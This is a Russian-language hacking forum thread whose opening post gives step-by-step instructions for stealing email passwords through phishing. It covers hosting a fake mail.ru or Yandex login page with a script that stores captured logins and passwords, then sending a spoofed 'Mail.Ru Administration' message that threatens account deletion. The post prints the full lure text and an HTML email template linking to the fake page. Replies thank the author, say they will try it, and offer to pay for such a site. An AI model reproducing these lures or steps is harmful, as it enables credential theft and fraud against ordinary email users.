Взлом Майла с помощью С++
-
*В этой теме я расскажу как можно без особых усилий и напряжений взломать почту жертвы. *
[spoiler=Пошагово:]Для этого нам понадобиться:- Хост с поддержкай PHP, MySQL.
- Фейк сайта(mail.ru, yandex.ru, rambler.ru и тд.) (смотря на каком домене висит жертва)
- Левый э-майл либо сайт для анонимной отпрвки писем...
4.Filezilla либо другой FTP-менеджер. [/spoiler]
Начнём: Берем за ранее зарегененый хост... заходим через filezilla на наш хост и заливаем наш фейк, ставим права 777. У нашего фейка есть три файла - это index.htm log.php и pass.php. index.htm - сам фейк куда будет приходить жертва log.php - это куда будет перенаправляться жертва после того как напишет свой лог и пасс. pass.php - отчёт (тут будет храниться наша база логов и паролей) все в фейком готово. Далее. Заходим на левый маил (название вашего маила должно быть похоже с названием админских мыльников...например web-password@mail.ru, support_safety@mail.ru) либо на сайт для анонимной отправки писем.
%(red)[1. Если для маила Заходим на на маил. Находим кнопку "Написать письмо"... кликаем. Далее появиться страница для написании письма. Заходим в "Расширенный формат" и кидаем туда шаблон письма...я буду использовать этот:]
Цитата:Уважаемый пользователь! Пожалуйста, подтвердите активность Вашего почтового ящика! В случае не получения Вашего подтверждения, Ваш почтовый ящик приобретет статус неактивного аккаунта и будет удален с нашего сервера Mail.Ru! Просим подтвердить активность Вашего почтового ящика, для этого пройдите по следущей ссылке. В случае не получения Вашего подтверждения, Ваш аккаунт приобретет статус недействительного и будет удален с нашего сервера без возможности восстановления. Все эти временные неудобства по причине того, что мы хотим повысить качество и скорость работы нашей системы. Вы получили это письмо, потому что зарегистрированы на сайте Mail.Ru С уважением, Aдминистрация Mail.Ru
Далее находим там строчку Просим подтвердить активность Вашего почтового ящика, для этого пройдите по следущей ссылке. и выделяем слово ссылке и кликаем на кнопку "гиперссылка" ... далее появлятся мини-окошко туда вы вписываем адрес нашего фейка. ну а дальше пишем: **Кому:** (мыло жертвы) **Копия:** (нетрогаем) **Скрытая:** (тож нетрогаем) **Тема:** Уважаемый пользователь! (либо что другое, главное чтобы жертва поняла что это письмо важное) **Важность:** Высокая (ну это не обезательно) Всё кликаем отправить. Если вы хотите с анонимки отправить то там легче: Пишем: **Кому:** (мыло жертвы) **От кого:** Администрация Mail.Ru <administration@corp.mail.ru> дальше шаблон письма в Html формате
Цитата:
<xHTML><xBODY> <div>Уважаемый пользователь!</div> <BR><div>Пожалуйста, подтвердите активность Вашего почтового ящика!</div> <div>В случае не получения Вашего подтверждения, Ваш почтовый ящик приобретет статус неактивного</div> <div>аккаунта и будет удален с нашего сервера Mail.Ru!</div> <div>Просим подтвердить активность Вашего почтового ящика, для этого пройдите по следущей <A href="http://ваш_хост/win.mail.ru/index.htm" target="_blank" onclick="return cfm(this);" >ссылке</A>.</div> <BR><div>В случае не получения Вашего подтверждения, Ваш аккаунт приобретет статус недействительного и будет удален с нашего сервера без возможности восстановления.</div> <div>Все эти временные неудобства по причине того, что мы хотим повысить качество и скорость работы нашей системы.</div> <BR><div>Вы получили это письмо, потому что зарегистрированы на сайте Mail.Ru</div> <BR><div>С уважением,</div> <div>Aдминистрация Mail.Ru</div> </xBODY></xHTML>
И отправляем.
Ну собственно и ждём пока жертва откроет письмо и клюнет на наш фейк..
Его данные придут к нам в отчёт (pass.php).
Если жертва совсем умная, то само собой она не клюнет..=)
Удачного хака.
[spoiler=О благодарности][/spoiler] -
спасибо большое:):
-
ego1sT, Нез.
-
Завтра попробую.
-
ForZik, Потом отпишешь
-
Кто сделает мне такой сайт плачу монеты
-